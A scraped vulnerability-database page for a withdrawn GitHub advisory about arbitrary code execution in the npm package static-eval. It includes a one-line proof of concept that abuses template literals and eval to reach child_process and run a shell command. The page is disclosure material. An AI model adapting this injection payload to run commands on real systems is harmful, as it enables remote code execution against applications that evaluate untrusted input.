Lucene search

K
githubGitHub Advisory DatabaseGHSA-8V27-2FG9-7H62
HistoryMay 06, 2021 - 4:11 p.m.

Withdrawn: Arbitrary Code Execution in static-eval

2021-05-0616:11:25
CWE-94
GitHub Advisory Database
github.com
30

0.002 Low

EPSS

Percentile

63.8%

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require(‘static-eval’); var parse = require(‘esprima’).parse; var src=“(function (x) { return ${eval(“console.log(global.process.mainModule.constructor._load(‘child_process’).execSync(‘ls’).toString())”)} })()” var ast = parse(src).body[0].expression; evaluate(ast)

WITHDRAWN

This was deemed not a vulnerability. See this issue for details.

CPENameOperatorVersion
static-evalle2.1.0

0.002 Low

EPSS

Percentile

63.8%

Related for GHSA-8V27-2FG9-7H62